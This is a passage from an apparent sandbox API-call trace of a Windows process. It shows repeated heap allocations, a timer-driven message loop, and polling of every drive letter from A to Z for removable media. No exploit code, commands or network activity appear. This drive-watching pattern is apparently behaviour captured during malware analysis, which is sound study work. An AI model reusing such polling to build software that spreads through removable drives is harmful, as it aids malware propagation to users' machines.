lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.854] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.854] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.854] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.854] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.854] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.855] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.855] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.855] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.855] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.855] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.855] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.855] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.856] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.856] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.856] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.856] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.856] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.856] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.857] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.857] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.857] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.857] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.857] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.857] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.858] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.858] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.858] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.858] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.858] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.859] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.859] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.859] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.859] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.859] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.859] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.859] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.859] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.860] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.860] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.860] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.860] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.860] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.860] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.860] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0218.860] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.861] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0218.861] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0218.861] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.861] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.862] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.862] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.862] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0218.862] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.862] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.862] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.862] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.863] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.863] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.863] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.863] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.863] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.864] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.864] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.864] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.864] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.864] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.864] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.865] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.865] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.865] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.865] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.865] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.865] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.866] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.866] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.866] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.866] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.866] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.867] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.867] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.867] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.881] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.881] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.882] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.882] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.882] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.882] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.882] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.882] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.882] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.882] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0218.883] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0218.883] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.883] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.883] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.883] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.883] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.884] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.884] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.884] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.884] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.884] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.885] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.885] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.885] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.885] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.885] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.885] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.885] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.886] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.886] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.886] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.886] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.886] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.886] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.930] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.930] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.930] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.930] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.931] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.931] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.931] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.931] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.932] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.932] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.932] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.932] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.932] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.932] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.932] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.933] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.933] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0218.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0218.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0218.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.933] HeapFree (in: hHeap=0x12c0000, 